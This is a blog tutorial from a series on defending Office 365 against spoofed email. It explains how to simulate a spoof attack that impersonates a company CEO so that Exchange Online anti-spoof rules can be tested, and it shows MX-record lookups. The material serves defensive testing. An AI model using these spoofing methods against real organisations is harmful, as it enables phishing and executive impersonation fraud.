When we hear the term “spoof E-mail attack,” the initial association that appears to our mind is – a hacker sitting in a dark room, filled with flashing lights, which quickly tap the keyboard commands and strange markings!
Well, in reality, the ability to perform or simulate E-mail spoof attack is very simple and can be accomplished very easily by each one of us.
In the current article, we will demonstrate three easy and straightforward options for simulating
E-mail spoof attack.
Table of content | Click to expand
Dealing with spoofed E-mail office 365 | Article Series
- Dealing with an E-mail spoof attack | general introduction | Office 365 based environment | Part 1#12
- Detect Spoof E-mail And Send An Incident Report Using Exchange Online Rule |Part 2#12
- Configuring exceptions for the Exchange Online Spoof E-mail rule |Part 3#12
- Detect Spoof E-mail And Mark The E-mail as spam Using Exchange Online Rule |Part 4#12
- Detect Spoof E-mail And Delete The Spoof E-mail Using Exchange Online Rule |Part 5#12
- Detect Spoof E-mail – Prepend The Subject Of The Spoof E-mail + Add Disclaimer Using Exchange Online Rule |Part 6#12
- Detect Spoof E-mail And Send The Spoof E-mail To Administrative Quarantine Using Exchange Online Rule |Part 7#12
- Detect Spoof E-mail And Raise the SCL value to “9” – Send E-mail To Quarantine Using Exchange Online Rule |Part 8#12
- Analyzing The Results Of The Exchange Spoof E-mail rule |Part 9#12
- How to Simulate E-mail Spoof Attack |Part 10#12
- How to Simulate E-mail Spoof Attack |Part 11#12
- Report Spoof E-mail And Send E-mail For Inspection In Office 365|Part 12#12
Q1: Do you not think that it’s dangerous to post publicly information on how to carry out the spoofed E-mail attack?
A1: No, the “black hat” elements that perform a spoof E-mail attack, are usually professionals who don’t need my “help and advice” on how to perform the spoof E-mail attack.
Q2: Why should I learn about how to simulate a spoof E-mail attack?
A2: Because when we are building a “security mail infrastructure” that needs to identify and block various E-mail attacks such as – spoof E-mail attack, we need a way to test our security mail infrastructure.
In other words, we are the “white hat” side; that needs to know about the method of the “black hat” side.
We need to have the ability to “mimic” the operations that executed by the hostile element that performs the spoof E-mail attack.
We need to know how to carry out a spoof E-mail attack so; we could verify that the mail security measures that we are implemented such as – Exchange Online Spoofed E-mail rule, are working correctly and doing what they need to do – identify, block and alert about an event of spoof E-mail attack.
What tools and methods for performing the spoof E-mail attack, we will review in the current article?
In the current article, I will demonstrate three options or methods that we can use for simulating spoof E-mail attacks.
- Option 1 – by using a very useful and efficient GUI mail client named – Jbmail
- Option 2 – by using a telnet client to perform SMTP session with the destination
- Option 3 – by using public online web-based tools
Simulating E-mail Spoof Attack – the Action Plan
Before we start with the actual process, in which we will try to examine the Exchange Online spoof transport rule, it’s important that we will know what the “action plan is” and the task order that needs to implement:
Step 1 – create the required Exchange Online transport rule, that should identify Spoof email and will execute a particular action as a response.
Step 2- Plaining the Spoof email attack
Decide about the E-mail address that will use in our Spoof E-mail attack
- The source recipient E-mail address – this is the E-mail address that will utilize by the “hostile element” that tries to impersonate himself to a legitimate organization recipient
- The destination E-mail address – this is the E-mail address of the organization user whom we try to “attack”.
Step 3 – Choosing the “attack tool.”
We will need to decide what is the tool that we will use for simulating the Spoof email attach.
Step 4 – Get the hostname of the mail server that represents the domain that we want to test.
Step 5 – Executing the Spoof email attack
Step 6 – verify if the Exchange Online transport rule manages to “identify” the E-mail spoof attack + implement the required actions such as – block the E-mail message, etc.
Simulating E-mail Spoof Attack | Our scenario description
Our organization is represented by the domain name: o365pilot.com
Lately, our organization has experienced E-mail Spoof attack, in which the hostile element presents himself as Suzan, our company chief executive officer.
This hostile element sends an E-mail message to our company employees on behalf of Suzan (using the E-mail address Suzan@o365pilot.com).
To be able to prevent this spoofing attack, we have created an Exchange Online Spoof email that will identify Spoof email attacks.
The central concept of this spoofing attack is that we will address the Exchange Online server who represents the domain name – o365pilot.com, and presents ourselves as Suzan@o365pilot.com but, without providing any user credentials (anonymous SMTP session).
The destination recipient whom we will try to “attack is Bob@o365pilot.com
Get the host name of the destination mail server
When we choose the option of using the GUI mail client named – Jbmail or using a SMTP telnet session, the preliminary information that we need to have is the Host name of the destination mail server that represents the domain which we want to test.
For example – in case that we want to simulate a spoof E-mail attack for checking the security infrastructure of a domain named – o365pilot.com, we will first need to know what is the host name of the mail server\s that represents this domain.
In more technically terms – we will need to perform DNS query looking for the MX record of the host\s that accounts for a particular domain name.
In our particular scenario, we will try to spoof the identity of a recipient named – Bob@o365pilot.com
To be able to address the mail server that represents the domain name o365pilot.com, we will need to get the exact hostname of the mail server.
We will get the name of the mail server by query public DNS server for the MX record of the domain name – o365pilot.com
Technically, there are many tools and options for creating the required query.
Get the host name of the destination mail server using NSLOOKUP
In our specific example, we will use the built in windows command tool named- NSLOOOKUP
To get the required information, we will open the command prompt and type the following command:
In the following screenshot, we can see results.
The hostname of the mail server that represents the domain name – o365pilot.com, is o365pilot-com.mail.protection.outlook.com
Get the host name of the destination mail server using MXTOOLBOX
In case that we prefer using more friendly interface that the NSLOOKUP command interface, we can use a variety of web-based tool that will enable us to get the host name of a mail server that represents a specific domain name.
My favorite web tool is the MXTOOLBOX web site
In the following screenshot, we can see an example to the way that we use for getting the required hostname.
In our particular scenario, we are looking for the hostname of the mail server that represents the domain name – o365pilot.com
The answer will include the server hostname + his IP address.
The next article in the current article series
In the next article – How to Simulate E-mail Spoof Attack |Part 11#12, we will review three different tools that we can use for simulating E-mail attack that will help us to test the Strength of the Exchange Online Spoofed E-mail rule.
It is important for us to know your opinion on this article